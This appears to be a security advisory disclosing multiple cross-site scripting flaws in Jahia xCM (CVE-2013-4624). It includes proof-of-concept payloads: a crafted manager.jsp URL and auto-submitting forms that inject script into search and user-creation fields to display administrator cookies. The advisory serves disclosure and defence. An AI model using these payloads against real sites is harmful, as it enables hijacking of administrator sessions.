Multiple XSS Vulnerabilities in Jahia xCM

High-Tech Bridge Security Research Lab discovered multiple XSS vulnerabilities in Jahia xCM, which can be exploited to perform cross-site scripting attacks against administrator of vulnerable application.

1. Multiple Cross-Site Scripting (XSS) Vulnerabilites in Jahia xCM: CVE-2013-4624
   1.1 The vulnerability exists due to insufficient sanitisation of user-supplied data in “site” HTTP GET parameter passed to “/engines/manager.jsp” script. A remote attacker can trick a logged-in administrator to open a specially crafted link and execute arbitrary HTML and script code in browser in context of the vulnerable website.
   The exploitation example below uses JavaScript ‘alert()’ function to display administrator’s cookies:
   http://[host]/engines/manager.jsp?conf=repositoryexplorer&site=%3C/script%3E %3Cscript%3Ealert%28document.cookie%29;%3C/script%3E

1.2 The vulnerability exists due to insufficient filtration of user-supplied data in “searchString” HTTP POST parameter passed to “/administration/” URI when “do=users” and “sub=search”. A remote attacker can trick a logged-in administrator to open a specially crafted link and execute arbitrary HTML and script code in browser in context of the vulnerable website.
The exploitation example below uses JavaScript ‘alert()’ function to display administrator’s cookies:
<form action=“http://[host]/administration/?do=users&sub=search” method=“post” name=“main”>
<input type=“hidden” name=“searchString” value=“'><script>alert(document.cookie);</script>”>
<input type=“submit” id=“btn”>
</form>
<script>
document.main.submit();
</script>

1.3 The vulnerability exists due to insufficient sanitisation of user-supplied data in “username”, “manage-user-property#j:firstName”, “manage-user-property#j:lastName”, “manage-user-property#j:email” and “manage-user-property#j:organization” HTTP POST parameters passed to “/administration/” URI when “do=users” and “sub=processCreate”. A remote attacker can trick a logged-in administrator to open a specially crafted link and execute arbitrary HTML and script code in browser in context of the vulnerable website.
The exploitation example below uses JavaScript ‘alert()’ function to display administrator’s cookies:
<form action=“http://[host]/administration/?do=users&sub=processCreate” method=“post” name=“main”>
<input type=“hidden” name=“username” value=“'><script>alert(document.cookie);</script>”>
<input type=“hidden” name=“manage-user-property#j:firstName” value=“'><script>alert(document.cookie);</script>”>
<input type=“hidden” name=“manage-user-property#j:lastName” value=“'><script>alert(document.cookie);</script>”>
<input type=“hidden” name=“manage-user-property#j:email” value=“'><script>alert(document.cookie);</script>”>
<input type=“hidden” name=“manage-user-property#j:organization” value=“'><script>alert(document.cookie);</script>”>
<input type=“hidden” name=“actionType” value=‘save’>
<input type=“submit” id=“btn”>
</form>
<script>
document.main.submit();
</script>